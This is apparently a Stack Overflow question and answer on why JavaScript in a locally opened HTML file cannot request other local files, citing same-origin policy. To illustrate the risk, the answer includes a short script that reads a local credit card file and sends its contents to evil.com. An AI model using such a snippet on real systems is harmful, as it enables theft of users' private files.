-2

I'm kind of new to web technologies, but this has been something that always confused me.

If I have an html file with a javascript file and text file in the same directory, why can't I just open the html file in my web browser (C:\somepath\index.html) and read the text file with a GET request from the javascript file?

If I put throw those files on a web server (such as tomcat), it suddenly works. Why is that?

I know you can read local files with HTML5, but I am curious why you couldn't before.

Sorry, if I'm using incorrect terminology.

SelfSurgery
  • 382
  • 3
  • 11
  • 1
    This is not the place for this type of question. It is far too broad. – Anonymous Aug 31 '14 at 00:38
  • 2
    Ajax needs an [origin to validate](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) and `file://` doesn't have one. "[Origin null is not allowed by Access-Control-Allow-Origin](http://stackoverflow.com/questions/8456538/origin-null-is-not-allowed-by-access-control-allow-origin)" – Jonathan Lonowski Aug 31 '14 at 00:39
  • @Anonymous Where would you recommend I get an answer to this question? I didn't know any of the key words (because I'm new) that Jonathan's link used so it was hard to find an answer. Most tutorials I find simply say "start tomcat" but don't explain why so I thought I would ask here. – SelfSurgery Aug 31 '14 at 01:04
  • @user3543405 You can look on http://stackexchange.com/sites and there *may* be a site more suitable. Or, you can significantly decrease how broad the question is. – Anonymous Aug 31 '14 at 01:18

1 Answers1

3

First of all, an HTTP request looks like this:

GET / HTTP/1.1
Host: stackoverflow.com
… more headers …

It is received by a server, which can then decide to respond with anything. When your browser displays local pages, it doesn’t actually make any requests at all; there’s no server to receive them. It just special-cases the file: scheme and displays files.

As to why you can’t request other local files from a local file: that would be an enormous security issue. You can display other webpages from local files, so imagine: you save a webpage one day to open it later, and in it is:

<script>
var rq = new XMLHttpRequest();
rq.open('GET', 'file:///C:\\Users\\some intelligent guess\\' +
               'Desktop\\credit card info.txt', false);
rq.send(null);
document.location = 'http://evil.com/save?data=' + encodeURIComponent(rq.responseText);
</script>

Easy theft. Reading local files with HTML5, on the other hand, is only possible when the user manually selects the files to be read using a file browsing dialogue. The webpage doesn’t have permission to read arbitrary files without interaction.

Ry-
  • 218,210
  • 55
  • 464
  • 476
  • thanks. I knew it was some sort of security issue, but I was wondering what made it "safer" in HTML5. – SelfSurgery Aug 31 '14 at 00:58
  • I think the important part here (in relation to your question) is to understand that GET and POST requests are actually _HTTP_ requests, and so require a HTTP server to understand and respond to them. – Steven Bakhtiari Aug 31 '14 at 01:10
  • @StevenBakhtiari Wow. That should have clicked a lot sooner for me than it did. – SelfSurgery Aug 31 '14 at 01:16